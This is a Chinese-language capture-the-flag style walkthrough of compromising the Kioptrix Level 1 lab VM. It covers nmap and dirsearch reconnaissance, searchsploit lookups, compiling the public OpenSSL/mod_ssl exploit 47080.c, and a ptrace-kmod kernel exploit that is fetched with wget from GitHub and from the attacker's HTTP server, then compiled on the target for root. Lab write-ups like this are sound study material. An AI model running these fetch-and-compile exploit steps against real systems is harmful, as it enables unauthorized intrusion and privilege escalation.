声明! 学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)
靶场:Kioptix Level 1靶场渗透测试
攻击机:kali-linux-2024
第一部分:信息收集
1,将两台虚拟机网络连接都改为NAT模式,并查看靶机的MAC地址
2,攻击机上做主机扫描发现靶机
arp-scan -l
靶机IP地址192.168.23.148,攻击机IP地址192.168.23.140
3,扫描靶机端口服务
nmap -sS -sV -n -T4 -p- 192.168.23.148
或者使用nmap的漏洞扫描脚本
nmap --script=vuln 192.168.23.148 -o vuln
4,开放SSH服务的22端口一般没有可利用漏洞,一般获得普通用户权限之后再做横向移动。所以只能访问一下80端口开放的http服务
这是此服务器的默认网页。 Web 服务器软件正在运行,但没有任何内容。
5,没有内容,突破口不在这。可以对网站子目录进行爆破,看看有无隐藏子目录
dirsearch -u 192.168.23.148 -x 404,403
爆破出来几个比较可疑的网站子目录/test.php,/mrtg
访问192.168.23.148/test.php
访问192.168.23.148/mrtg/
突破口大致在这个网页,描述了一些内容大致和MRTG有关
多路由器流量图表绘制工具(Multi Router Traffic Grapher)
多路由器流量图表绘制工具(MRTG)是一种用于监控网络链路流量负载的工具。MRTG会生成包含GIF图像的HTML页面,这些图像能够实时直观地展示流量情况。查看 http://www.ee.ethz.ch/stats/mrtg/ 可获取示例。MRTG基于Perl和C语言编写,可在UNIX和Windows NT系统下运行。MRTG已在网络上的许多站点成功使用。查看MRTG站点地图(MRTG - Site - Map)。
6,没有特别明朗的线索,尝试whatweb扫描网站框架
7,Apche的版本貌似有点低,尝试searchsploit Apache |grep '1.3.20'
两个漏洞存在于windows平台搭建的Apache+PHP服务,不能利用。
8,再搜索openssl 0.9.6b
searchsploit openSSL 0.9.6b
OpenSSL概述
OpenSSL是一个开源的软件库,广泛用于实现SSL(Secure Sockets Layer)和TLS(Transport Layer Security)协议。它不仅提供了加密库,还包含了用于加密、解密、认证和证书管理的工具。OpenSSL支持多种加密算法,包括对称加密和非对称加密,并且可以用于生成和管理数字证书。
9,还有mos_ssl
mod_ssl概述
mod_ssl是一个用于Apache HTTP服务器的模块,它提供了对SSL和TLS协议的支持。SSL(Secure Sockets Layer)和TLS(Transport Layer Security)是用于在网络上加密数据和提供通信双方身份验证的协议。mod_ssl使得Apache服务器能够通过HTTPS协议提供安全的Web服务。
10,一切线索都指向了存在一个公开漏洞
11,将漏洞利用文件导出来利用searchsploit 47080.c -m
查看一下利用方法
12,然后给漏洞利用程序进行操作
apt-get install libssl-dev
gcc -o 47080 47080.c -lcrypto
漏洞成功利用
13,接下来就需要进行提权操作,查看一下能不能sudo -l,结果需要密码
14,然后再查看有操作系统内核版本Linux kioptrix.level1 2.4.7-10
而漏洞利用的时候存在一个错误
根据你提供的问题,你正在尝试执行一段命令序列,其中包括下载一个名为“ptrace-kmod.c”的文件,编译它,删除源文件,并最终运行生成的可执行文件。然而,在执行过程中,你遇到了几个问题。
首先,wget命令无法从指定的URL下载文件,因为无法建立SSL连接。这可能是由于网络问题、防火墙设置或URL不正确等原因造成的。
其次,gcc命令无法找到名为“ptrace-kmod.c”的文件,因此无法进行编译。这是因为wget命令未能成功下载该文件,所以它不存在于/tmp目录中。
最后,rm命令也无法删除名为“ptrace-kmod.c”的文件,因为该文件不存在。
要解决这些问题,你可以尝试以下步骤:
- 确保你的网络连接正常,并且可以访问外部网站。
- 检查防火墙设置,确保允许建立SSL连接。
- 确认提供的URL是正确的,并且文件确实存在于该位置。
- 如果上述步骤都无效,你可以尝试使用其他下载工具,如curl,来代替wget进行下载。
- 如果你仍然无法解决问题,你可以尝试在不同的网络环境中执行命令,或者联系相关网站管理员寻求帮助。
15,那么解决办法就是在kali上面下载这个公开的exp,然后通过http服务将这个exp传入靶机
wget https://github.com/piyush-saurabh/exploits/blob/master/ptrace-kmod.c
然后开启http服务 python -m http.server
16,靶机通过wget方法从攻击机上下载这个exp(从github上面下载也可以)
wget http://192.168.23.140:8000/ptrace-kmod.c
17,在靶机上编译,然后再执行exp成功提权成为root用户
gcc -o exp ptrace-kmod.c